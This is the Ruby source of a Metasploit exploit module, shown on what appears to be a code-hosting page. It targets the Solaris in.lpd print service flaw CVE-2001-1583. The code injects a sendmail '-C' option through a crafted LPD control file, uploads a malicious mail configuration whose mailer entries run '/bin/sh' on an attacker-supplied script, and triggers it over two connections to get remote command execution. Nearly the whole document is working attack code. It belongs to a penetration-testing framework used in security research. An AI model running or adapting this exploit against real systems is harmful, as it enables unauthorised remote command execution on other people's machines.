165 lines
4.3 KiB
Ruby
165 lines
4.3 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Solaris LPD Command Execution',
|
|
'Description' => %q{
|
|
This module exploits an arbitrary command execution flaw in
|
|
the in.lpd service shipped with all versions of Sun Solaris
|
|
up to and including 8.0. This module uses a technique
|
|
discovered by Dino Dai Zovi to exploit the flaw without
|
|
needing to know the resolved name of the attacking system.
|
|
},
|
|
'Author' => [ 'hdm', 'ddz' ],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2001-1583'],
|
|
[ 'OSVDB', '15131'],
|
|
[ 'BID', '3274'],
|
|
],
|
|
'Platform' => %w{ solaris unix },
|
|
'Arch' => ARCH_CMD,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 8192,
|
|
'DisableNops' => true,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
'RequiredCmd' => 'generic perl telnet',
|
|
}
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'Automatic Target', { }]
|
|
],
|
|
'DisclosureDate' => 'Aug 31 2001',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(515)
|
|
])
|
|
end
|
|
|
|
def exploit
|
|
|
|
# This is the temporary path created in the spool directory
|
|
spath = "/var/spool/print"
|
|
|
|
# The job ID is squashed down to three decimal digits
|
|
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
|
|
|
# The control file
|
|
control =
|
|
"H"+"metasploit\n"+
|
|
"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
|
|
"f"+"dfA"+jid+"config\n"+
|
|
"f"+"dfA"+jid+"script\n"
|
|
|
|
|
|
# The mail configuration file
|
|
mailcf =
|
|
"V8\n"+
|
|
"\n"+
|
|
"Ou0\n"+
|
|
"Og0\n"+
|
|
"OL0\n"+
|
|
"Oeq\n"+
|
|
"OQX/tmp\n"+
|
|
"\n"+
|
|
"FX|/bin/sh #{spath}/#{jid}script\n"+
|
|
"\n"+
|
|
"S3\n"+
|
|
"S0\n"+
|
|
"R\+ #local \\@blah :blah\n"+
|
|
"S1\n"+
|
|
"S2\n"+
|
|
"S4\n"+
|
|
"S5\n"+
|
|
"\n"+
|
|
"Mlocal P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
|
|
"Mprog P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
|
|
|
|
# Establish the first connection to the server
|
|
sock1 = connect(false)
|
|
|
|
# Request a cascaded job
|
|
sock1.put("\x02metasploit:framework\n")
|
|
res = sock1.get_once
|
|
if (not res)
|
|
print_status("The target did not accept our job request command")
|
|
return
|
|
end
|
|
|
|
print_status("Configuring the spool directory...")
|
|
if !(
|
|
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
|
|
send_file(sock1, 3, jid + "mail.cf", mailcf) and
|
|
send_file(sock1, 3, jid + "script", payload.encoded)
|
|
)
|
|
sock1.close
|
|
return
|
|
end
|
|
|
|
# Establish the second connection to the server
|
|
sock2 = connect(false)
|
|
|
|
# Request another cascaded job
|
|
sock2.put("\x02localhost:metasploit\n")
|
|
res = sock2.get_once
|
|
if (not res)
|
|
print_status("The target did not accept our second job request command")
|
|
return
|
|
end
|
|
|
|
print_status("Attempting to trigger the vulnerable call to the mail program...")
|
|
if !(
|
|
send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
|
|
send_file(sock2, 3, "dfa" + jid + "config", mailcf)
|
|
)
|
|
sock1.close
|
|
sock2.close
|
|
return
|
|
end
|
|
|
|
sock1.close
|
|
sock2.close
|
|
|
|
print_status("Waiting up to 60 seconds for the payload to execute...")
|
|
select(nil,nil,nil,60)
|
|
|
|
handler
|
|
end
|
|
|
|
def send_file(s, type, name, data='')
|
|
|
|
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
|
res = s.get_once(1)
|
|
if !(res and res[0,1] == "\x00")
|
|
print_status("The target did not accept our control file command (#{name})")
|
|
return
|
|
end
|
|
|
|
s.put(data)
|
|
s.put("\x00")
|
|
res = s.get_once(1)
|
|
if !(res and res[0,1] == "\x00")
|
|
print_status("The target did not accept our control file data (#{name})")
|
|
return
|
|
end
|
|
|
|
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
|
return true
|
|
end
|
|
end
|